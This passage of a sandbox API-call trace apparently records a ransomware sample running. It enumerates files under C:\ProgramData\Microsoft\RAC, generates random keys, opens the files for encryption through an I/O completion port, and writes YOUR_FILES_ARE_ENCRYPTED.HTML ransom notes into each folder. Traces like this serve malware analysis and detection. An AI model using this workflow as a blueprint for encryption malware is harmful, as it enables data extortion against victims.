lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x9ada4280, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.977] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0x9ada4280, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.977] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fa373b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafec2e40, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0156.977] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf") returned 65 [0156.977] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.977] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0156.977] lstrlenW (lpString=".sdf") returned 4 [0156.977] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0156.977] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.977] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.978] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fa373b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafec2e40, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0156.978] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.978] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0156.978] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\PublishedData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0156.978] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.136] CloseHandle (hObject=0x5a0) returned 1 [0157.137] GetProcessHeap () returned 0x270000 [0157.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0157.138] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0157.138] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned 42 [0157.138] GetProcessHeap () returned 0x270000 [0157.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0157.139] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData" [0157.139] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*" [0157.139] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.139] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.140] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5747b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x7f5747b0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0157.140] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf") returned 58 [0157.140] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.140] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0157.140] lstrlenW (lpString=".sdf") returned 4 [0157.140] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0157.140] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.140] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e59a53, ftCreationTime.dwHighDateTime=0x1cb88f6, ftLastAccessTime.dwLowDateTime=0x3e59a53, ftLastAccessTime.dwHighDateTime=0x1cb88f6, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0157.140] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat") returned 58 [0157.140] lstrcmpW (lpString1="RacMetaData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.140] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0157.140] lstrlenW (lpString=".dat") returned 4 [0157.140] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0157.140] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.140] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.141] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDataBookmarks.dat", cAlternateFileName="RACWMI~2.DAT")) returned 1 [0157.141] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 66 [0157.141] lstrcmpW (lpString1="RacWmiDataBookmarks.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.141] PathFindExtensionW (pszPath="RacWmiDataBookmarks.dat") returned=".dat" [0157.141] lstrlenW (lpString=".dat") returned 4 [0157.141] PathFindExtensionW (pszPath="RacWmiDataBookmarks.dat") returned=".dat" [0157.141] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.141] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0157.142] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=16412) returned 1 [0157.142] GetProcessHeap () returned 0x270000 [0157.142] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0157.146] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="07") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A4") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="11") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="14") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="02") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B3") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="8C") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C8") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0D") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="9F") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="C8") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="71") returned 2 [0157.146] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="E4") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="AD") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="8F") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0C") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="AC") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="91") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="69") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="A0") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="22") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="28") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="58") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="3F") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="0B") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F4") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="71") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="9D") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="51") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="8B") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="44") returned 2 [0157.147] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="78") returned 2 [0157.148] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" [0157.148] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0157.148] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0157.151] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0157.151] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat") returned 62 [0157.151] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.151] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0157.151] lstrlenW (lpString=".dat") returned 4 [0157.151] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0157.151] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.152] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0157.154] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 0 [0157.167] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.167] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 72 [0157.167] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\StateData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\statedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.167] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.170] CloseHandle (hObject=0x5a0) returned 1 [0157.171] GetProcessHeap () returned 0x270000 [0157.171] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0157.171] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0157.171] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned 37 [0157.171] GetProcessHeap () returned 0x270000 [0157.172] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0157.172] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp" [0157.172] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*" [0157.172] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ad860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab6ad860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab6f9b20, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql5130.tmp", cAlternateFileName="")) returned 1 [0157.172] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql5130.tmp") returned 49 [0157.172] lstrcmpW (lpString1="sql5130.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.172] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0157.172] lstrlenW (lpString=".tmp") returned 4 [0157.172] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0157.172] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab76bf40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql517F.tmp", cAlternateFileName="")) returned 1 [0157.172] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\sql517F.tmp") returned 49 [0157.172] lstrcmpW (lpString1="sql517F.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.172] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0157.172] lstrlenW (lpString=".tmp") returned 4 [0157.173] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0157.173] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab76bf40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql517F.tmp", cAlternateFileName="")) returned 0 [0157.173] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.173] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 67 [0157.173] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.173] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.176] CloseHandle (hObject=0x5a0) returned 1 [0157.176] GetProcessHeap () returned 0x270000 [0157.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0157.177] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 0 [0157.177] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.177] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 62 [0157.177] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\RAC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\rac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 